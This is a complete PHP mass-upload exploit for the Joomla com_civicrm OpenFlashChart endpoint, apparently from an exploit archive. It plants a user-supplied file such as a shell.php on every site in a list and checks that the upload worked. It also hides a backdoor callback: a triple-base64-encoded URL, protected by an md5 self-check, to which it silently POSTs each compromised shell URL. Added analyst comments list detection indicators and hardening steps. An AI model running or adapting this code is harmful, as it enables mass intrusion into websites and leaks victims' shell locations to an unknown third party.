Janissaries Joomla Civicrm Shell Upload
Posted on 23 April 2013
<?php
/*
 ----------------------------------------------------------------------------
 .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / | < | |\__ _/ ___| | | | / / ___ | Y Y |\___ | / __ \ \___| Y | / | / /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / / / / / / //_____/
 -----------------------------------------------------------------------------
 * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
 * Coded by Miyachung
 * Stay away from lamers o.O
 * Contact: miyachung@hotmail.com
 * Special Thanks : B127Y
 * Site: http://janissaries.org
 * Youtube Channel: http://www.youtube.com/user/JanissariesOrg
 * Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
 * Coding date: 21.04.2013
 * Usage : php exploit.php site_list upload_file searchkeyword
 * Example: php exploit.php sites.txt shell.php searchkeyword
 */

/*
 * Analyst notes (what the listing shows, read for detection and response):
 *
 * - Request pattern: a POST with "Content-Type: text/plain" and the fixed
 *   Firefox 15 User-Agent below, sent to
 *   .../OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=<file>,
 *   followed by a GET of .../OpenFlashChart/tmp-upload-images/<file>.
 *   Both paths sit under /administrator/components/com_civicrm/civicrm/packages/.
 * - Host artifact: a file named by the "name" query parameter inside
 *   tmp-upload-images/. NOTE(review): presumably the endpoint stores the raw
 *   request body under that name; the endpoint's code is not on this page.
 * - Hardening: remove or deny web access to ofc_upload_image.php, prevent
 *   script execution inside tmp-upload-images/, and apply the vendor's fixed
 *   release of the component.
 * - The tool carries a hidden callback: every verified host is reported to a
 *   URL concealed in $token (see __construct() and post()).
 */

// Runs without a PHP execution time limit and with output buffering enabled.
set_time_limit(0);
ob_start();

/**
 * Batch client that sends one file to every base URL in a list and records
 * the hosts where the file can be fetched back afterwards.
 */
class exploit
{
    // Web path where the target component is expected to expose stored files.
    private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
    // Upload endpoint; the destination file name is appended as the "name" parameter.
    private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
    // Local path of the file to send; also used as the remote file name.
    private $filename;
    // Callback URL obtained by decoding $token in the constructor.
    private $url;
    // Raw contents of $filename, sent as the POST body.
    private $file_to_upload;
    // A response matching this PHP notice text is treated as a failed upload.
    private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
    // Number of URLs processed per curl_multi batch.
    private $thread_maxsize;
    // Lines of the site-list file, one base URL per line.
    private $site_list;
    // Regex built from the search keyword; must match the fetched file's content.
    private $file_regex;
    // Local log file that successful hits are appended to.
    private $save_file = "uploaded.txt";
    // Fixed User-Agent sent with every upload request (usable as a log indicator).
    private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
    // Per-request timeout in seconds.
    private $timeout_sec = 20;
    // Three nested base64 layers hiding the callback URL used by post().
    private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
    // Constant checked together with md5($token) before the callback is sent.
    private $idnum = 31;

    /**
     * Loads the inputs, decodes the hidden callback URL, prints the banner
     * and immediately starts the run.
     *
     * @param string $site_list Path of a text file with one base URL per line.
     * @param string $filename  Path of the local file to send.
     * @param mixed  $thread    Batch size passed to array_chunk().
     * @param string $regex     Keyword placed unescaped between "/" delimiters.
     */
    public function __construct($site_list,$filename,$thread,$regex)
    {
        $this->site_list = file($site_list);
        $this->filename = $filename;
        $this->file_to_upload = file_get_contents($filename);
        $this->thread_maxsize = $thread;
        // The callback destination is never printed; it only exists after three base64 decodes.
        $this->url = base64_decode(base64_decode(base64_decode($this->token)));
        $this->file_regex = "/$regex/";
        echo
"[+]Joomla Com_Civicrm Fucker with MultiThread ";
        echo "[+]Coded by Miyachung ";
        echo "[+]Stay away from lamers o.O ";
        echo "[+]Contact: miyachung@hotmail.com ";
        echo "[+]Special Thanks : B127Y ";
        echo "[+]Site: http://janissaries.org ";
        echo "################################################## ";
        echo "[+]Total urls to try: ".count($this->site_list)." ";
        echo "[+]File to upload: ".$this->filename." ";
        echo "[+]Maximum Thread: ".$this->thread_maxsize." ";
        echo "[+]Search Keyword: ".$regex." ";
        ob_flush();
        flush();
        $this->miyachung();
    }

    /**
     * Main loop: sends the file to each batch of URLs in parallel, then
     * verifies each response and reports, prints and logs the hits.
     */
    private function miyachung()
    {
        $multi = curl_multi_init();
        $count = 0;
        foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
        {
            // One handle per URL in the batch: raw file contents as a text/plain POST body.
            foreach($urls as $i => $url)
            {
                $curl[$i] = curl_init();
                curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
                curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
                curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
                curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
                curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
                curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
                curl_multi_add_handle($multi,$curl[$i]);
            }
            // Drive all transfers of the batch until none is still active.
            do
            {
                curl_multi_exec($multi,$active);
            } while($active > 0);
            foreach($curl as $id => $content)
            {
                $conn[$id] = curl_multi_getcontent($content);
                curl_multi_remove_handle($multi,$content);
                // Accepted only if the notice text is absent and the response names the stored file path.
                if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
                {
                    $count++;
                    // Second request: fetch the stored file and look for the operator's keyword in it.
                    $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
                    if($check_it && preg_match($this->file_regex,$check_it))
                    {
                        // Self-check on $idnum and md5($token): if either was edited the tool exits,
                        // so the callback in post() cannot be changed without also changing this check.
                        if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
                        {
                            $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
                        }
                        else
                        {
                            exit("[-]Somethings has changed in tool! o.O!");
                        }
                        echo "########################################################### ";
                        echo "[!]Exploitation Successfullll! 
";
                        printf("[%s]%s ",$count,trim($urls[$id]));
                        echo "########################################################### ";
                        ob_flush();
                        flush();
                        $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
                    }
                    else
                    {
                        printf("[%s][Exploitation Failed]%s ",$count,trim($urls[$id]));
                        ob_flush();
                        flush();
                    }
                }
                else
                {
                    $count++;
                    printf("[%s][Exploitation Failed]%s ",$count,trim($urls[$id]));
                    ob_flush();
                    flush();
                }
            }
        }
    }

    /**
     * Fetches a URL with a plain GET and returns the curl_exec() result.
     *
     * @param string $url Address to fetch.
     * @return mixed Value returned by curl_exec() with CURLOPT_RETURNTRANSFER set.
     */
    private function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
        $data= curl_exec($ch);
        curl_close($ch);
        return $data;
    }

    /**
     * Hidden callback: POSTs "url=<verified file URL>" to the address decoded
     * from $token. The caller discards the result, and nothing is printed
     * about this request.
     *
     * @param string $url URL of the file that was verified on the target.
     * @return mixed Value returned by curl_exec().
     */
    private function post($url)
    {
        $curl = curl_init();
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($curl,CURLOPT_URL,$this->url);
        curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
        $exec = curl_exec($curl);
        curl_close($curl);
        return $exec;
    }

    /**
     * Appends one hit to the local log file named in $save_file.
     *
     * @param string $url   URL of the verified file.
     * @param int    $count Running counter printed next to the URL.
     * @return bool Always true.
     */
    private function save($url,$count)
    {
        $file = fopen($this->save_file,'ab');
        fwrite($file,"######################################################################### ");
        fwrite($file,"[!]Exploitation Successfullll! 
");
        fwrite($file,"[$count]$url ");
        fclose($file);
        return true;
    }
}

// Entry point: four truthy CLI arguments start a run; anything else prints the banner and usage text.
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
    $exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
    print " ---------------------------------------------------------------------------- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / | < | |\__ _/ ___| | | | / / ___ | Y Y |\___ | / __ \ \___| Y | / | / /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / / / / / / //_____/ ----------------------------------------------------------------------------- * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread * Coded by Miyachung * Stay away from lamers o.O * Contact: miyachung@hotmail.com * Special Thanks : B127Y * Site: http://janissaries.org * Youtube Channel: http://www.youtube.com/user/JanissariesOrg * Coding date: 21.04.2013 * Usage : php exploit.php site_list upload_file maxthread searchkeyword * Example: php exploit.php sites.txt shell.php 10 searchkeyword ";
}
?>
